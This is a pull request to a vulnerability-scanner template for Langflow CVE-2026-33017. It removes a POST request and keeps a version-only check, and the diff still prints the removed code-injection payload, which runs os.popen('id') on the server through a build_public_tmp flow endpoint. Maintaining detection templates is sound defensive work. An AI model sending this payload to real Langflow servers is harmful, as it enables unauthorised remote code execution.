### PR TITLE
fix: remove redundant CVE-2026-33017 exploit request

### DIFF
--- a/http/cves/2026/CVE-2026-33017.yaml
+++ b/http/cves/2026/CVE-2026-33017.yaml
@@ -22,48 +22,13 @@ info:
     epss-percentile: 0.97421
     cwe-id: CWE-94
   metadata:
-    verified: true
-    max-request: 2
+    max-request: 1
     vendor: langflow
     product: langflow
     shodan-query: http.favicon.hash:1727196746
-  tags: cve,cve2026,langflow,rce,ai,passive,kev,vkev
-
-flow: http(1) || http(2)
+  tags: cve,cve2026,langflow,ai,passive,kev,vkev
 
 http:
-  - method: POST
-    path:
-      - "{{BaseURL}}/api/v1/build_public_tmp/00000000-0000-0000-0000-000000000000/flow"
-    body: |
-      {
-        "data": {
-          "nodes": [
-            {
-              "data": {
-                "node": {
-                  "template": {
-                    "code": {
-                      "value": "def function():\n    import os\n    return os.popen('id').read()"
-                    }
-                  }
-                }
-              }
-            }
-          ]
-        }
-      }
-    headers:
-      Content-Type: application/json
-
-    matchers:
-      - type: dsl
-        dsl:
-          - 'contains(content_type, "application/json")'
-          - 'regex("uid=[0-9]+.*gid=[0-9]+.*", body)'
-          - 'contains(body, "xmsg\":")'
-        condition: and
-
   - method: GET
     path:
       - "{{BaseURL}}/api/v1/version"
@@ -81,4 +46,3 @@ http:
         json:
           - ".version"
         internal: true
-# digest: 4b0a004830460221009ab4f87ef87a274ee6bb68cde416434bc6f9bd3f02ab9fc3426e74d258d5e5d4022100b8a2d0141b7f7f73660ba1dc6bdf4dc8be09a2612bf5c47a256404da942cfd57:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
Fixes projectdiscovery/nuclei-templates#16134

## Proposed Changes

- Removes the `build_public_tmp` POST request using the all-zero UUID public flow.
- Keeps the version endpoint check for vulnerable Langflow versions.
- Updates `metadata.max-request` to `1`.
- Removes the stale digest because the template content changed.

## Why

The removed request depends on `/api/v1/build_public_tmp/00000000-0000-0000-0000-000000000000/flow`, which does not represent a real public flow and returns a validation error instead of executing the proof. That made the template effectively version-only while still sending a redundant exploit-style request.

## Validation

- `ruby -e 'require "yaml"; YAML.load_file(ARGV.fetch(0)); puts "yaml ok"' http/cves/2026/CVE-2026-33017.yaml`
- `git diff --check`
- `go run github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest -validate -duc -t http/cves/2026/CVE-2026-33017.yaml`

Nuclei validation result: `All templates validated successfully`.
